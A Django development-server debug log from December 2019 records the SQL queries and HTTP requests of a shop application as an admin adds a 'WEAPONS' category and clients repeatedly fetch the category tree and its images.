(0.002) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'WEAPONS' LIMIT 1; args=('WEAPONS',) DEBUG 2019-12-07 13:18:24,574 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'WEAPONS' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('WEAPONS',) DEBUG 2019-12-07 13:18:24,578 utils 32196 139885061072640 (0.001) UPDATE "shop_category" SET "tree_id" = ("shop_category"."tree_id" + 1) WHERE "shop_category"."tree_id" > 8; args=(1, 8) DEBUG 2019-12-07 13:18:24,583 utils 32196 139885061072640 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('WEAPONS', NULL, 'categories/2019/12/07/collection1.png', 'WEAPONS', 'weapons', 1, 2, 9, 0) RETURNING "shop_category"."id"; args=('WEAPONS', None, 'categories/2019/12/07/collection1.png', 'WEAPONS', 'weapons', 1, 2, 9, 0) DEBUG 2019-12-07 13:18:24,585 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:18:24.584021+00:00'::timestamptz, 6, 8, '11', 'WEAPONS', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 18, 24, 584021, tzinfo=), 6, 8, '11', 'WEAPONS', 1, '[{"added": {}}]') [07/Dec/2019 13:18:24] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:18:24,854 utils 32196 139885061072640 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:18:24.838383+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 18, 24, 838383, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:18:24,858 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:18:24,862 utils 32196 139885061072640 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:18:24,863 utils 32196 139885061072640 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:18:24,871 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-07 13:18:25,036 utils 32196 139885061072640 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:18:25.032838+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 18, 25, 32838, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:18:25] "GET /shop/category/ HTTP/1.0" 200 7190 DEBUG 2019-12-07 13:18:25,354 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:18:25.339236+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 18, 25, 339236, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:18:25,358 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:18:25] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:18:28,201 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:18:28,209 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:18:28,213 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:18:28,217 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:18:28,221 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-07 13:18:28,224 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:18:28,228 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:18:28,232 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:18:28,236 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:18:28,240 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:18:28,243 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:18:28,247 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:18:28] "GET /api/v1/categories/ HTTP/1.0" 200 1715 DEBUG 2019-12-07 13:19:58,757 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:19:58,763 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:19:58,767 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:19:58,770 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:19:58,774 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-07 13:19:58,776 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:19:58,779 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:19:58,782 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:19:58,785 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:19:58,788 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:19:58,791 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:19:58,794 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:19:58] "GET /api/v1/categories/ HTTP/1.0" 200 1715 DEBUG 2019-12-07 13:20:39,851 utils 32196 139885061072640 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:20:39,856 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:20:39,859 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:20:39,861 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:20:39,863 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-07 13:20:39,865 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:20:39,868 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:20:39,870 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:20:39,872 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:20:39,874 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:20:39,877 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:20:39,879 utils 32196 139885061072640 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:20:39] "GET /api/v1/categories/ HTTP/1.0" 200 1715 [07/Dec/2019 13:20:40] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [07/Dec/2019 13:20:40] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [07/Dec/2019 13:20:40] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [07/Dec/2019 13:20:40] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [07/Dec/2019 13:20:40] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [07/Dec/2019 13:20:42] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [07/Dec/2019 13:20:42] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [07/Dec/2019 13:20:42] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [07/Dec/2019 13:20:43] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-07 13:20:51,872 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:20:51,877 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:20:51,879 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:20:51,881 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:20:51,883 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-07 13:20:51,885 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:20:51,888 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:20:51,892 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:20:51,894 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:20:51,897 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:20:51,899 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:20:51,902 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:20:51] "GET /api/v1/categories/ HTTP/1.0" 200 1715 [07/Dec/2019 13:20:52] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 DEBUG 2019-12-07 13:21:16,696 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:21:16.688134+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 21, 16, 688134, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:21:16,699 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:21:16,701 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 2; args=(2,) DEBUG 2019-12-07 13:21:16,746 utils 32196 139885050582784 (0.001) DECLARE "_django_curs_139885050582784_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:21:16,779 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:21:16.777865+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; 